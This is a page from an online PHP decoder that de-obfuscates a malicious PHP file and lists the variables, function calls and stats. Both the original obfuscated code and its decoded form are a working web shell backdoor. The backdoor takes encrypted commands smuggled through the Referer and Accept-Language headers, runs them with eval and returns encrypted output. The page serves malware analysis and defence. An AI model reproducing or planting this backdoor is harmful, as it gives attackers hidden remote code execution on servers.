Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $q='[$m[2]RwRw[$z]];if(strpoRws($p,RwRw$h)===Rw0){$s[$i]=Rw"";$p=$sRws($p,3);Rw}if(R..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$q='[$m[2]RwRw[$z]];if(strpoRws($p,RwRw$h)===Rw0){$s[$i]=Rw"";$p=$sRws($p,3);Rw}if(RwaRwrray_key_existRws($i,$RwRws)){$s[$i].=Rw$';
$F=str_replace('D','','DcreaDteD_fDunDctDion');
$Z='FERER"]RwRw;$rRwa=@$r["HTTRwP_ACCEPT_LANGUAGE"]Rw;Rwif($rr&&$Rwra){$uRw=pRwRwarse_url($rr);parRwRwse_sRwRwtr($u["qRwuery"],$';
$v='q);$q=arRwray_valueRws($q);pRwRwreg_matchRw_all("/([\\Rww])Rw[\\wRw-]+(?:;q=0.(Rw[\\Rwd]))RwRw?,?/",$ra,$mRw);if($q&Rw&Rw$m){';
$n='w(RwpreRwg_replacRwe(Rwarray("/_/","/-/")Rw,arrayRw("/","+"Rw),$ssRw($s[$Rwi]Rw,0,Rw$e)))Rw,$k)RwRw));$o=ob_gRwet_contents()';
$z=';obRw_end_Rwclean();Rw$dRwRw=basRwe64_encode(x(gzcoRwmpress($o)Rw,$k));pRwrRwintRw("<$k>$d</Rw$k>");@seRwssion_dRwestroyRw();}}}}';
$k='ss(md5($i.$kRwh)Rw,0,3));Rw$f=$sl($Rwss(mRwRwdRw5($i.$kf),0,Rw3));RwRw$p="";foRwr($z=1;$z<counRwt($m[1]);Rw$z++)Rw$p.=Rw$q';
$h='Rwp;$e=sRwtrpos(Rw$s[$i],$fRw);iRwf($e){$k=$kRwh.$kfRw;Rwob_start();@RwevRwaRwl(@gzuncRwompress(@x(@RwbaRwse64_decodRweR';
$S='wr($j=Rw0;($j<$c&Rw&$i<$l);Rw$j+Rw+,$i+Rw+){$oRw.=$t{$i}^$k{Rw$j};}}reRwturnRw $o;}$r=Rw$_SERVRwER;$rRwr=@$r["RwHTTRwP_RRwERw';
$b='$kh="5d41";RwRw$kf="40Rw2Rwa";funcRwtion x($t,$k)Rw{$c=strlRwen(Rw$k);$l=Rwstrlen($Rwt)Rw;$o="";fRwRwor($i=0;Rw$i<$l;)Rw{foR';
$y='@sRwession_staRwrt();$s=&$_RwSESRwSION;$ss="RwsubRwRwstr";$sRwl="sRwtrtolower";$i=$mRwRw[1][0].$m[1]Rw[Rw1];$h=Rw$sl(Rw$';
$G=str_replace('Rw','',$b.$S.$Z.$v.$y.$k.$q.$h.$n.$z);
$m=$F('',$G);$m();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$F create_function
$G $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$S wr($j=Rw0;($j<$c&Rw&$i<$l);Rw$j+Rw+,$i+Rw+){$oRw.=$t{$i}^$k{..
$Z FERER"]RwRw;$rRwa=@$r["HTTRwP_ACCEPT_LANGUAGE"]Rw;Rwif($rr&&..
$b $kh="5d41";RwRw$kf="40Rw2Rwa";funcRwtion x($t,$k)Rw{$c=strlR..
$h Rwp;$e=sRwtrpos(Rw$s[$i],$fRw);iRwf($e){$k=$kRwh.$kfRw;Rwob_..
$k ss(md5($i.$kRwh)Rw,0,3));Rw$f=$sl($Rwss(mRwRwdRw5($i.$kf),0,..
$m None
$n w(RwpreRwg_replacRwe(Rwarray("/_/","/-/")Rw,arrayRw("/","+"R..
$q [$m[2]RwRw[$z]];if(strpoRws($p,RwRw$h)===Rw0){$s[$i]=Rw"";$p..
$v q);$q=arRwray_valueRws($q);pRwRwreg_matchRw_all("/([\Rww])Rw..
$y @sRwession_staRwrt();$s=&$_RwSESRwSION;$ss="RwsubRwRwstr";$s..
$z ;obRw_end_Rwclean();Rw$dRwRw=basRwe64_encode(x(gzcoRwmpress(..

Stats

MD5 0c29c860a41f8e7273c846e6cb4d4def
Eval Count 1
Decode Time 85 ms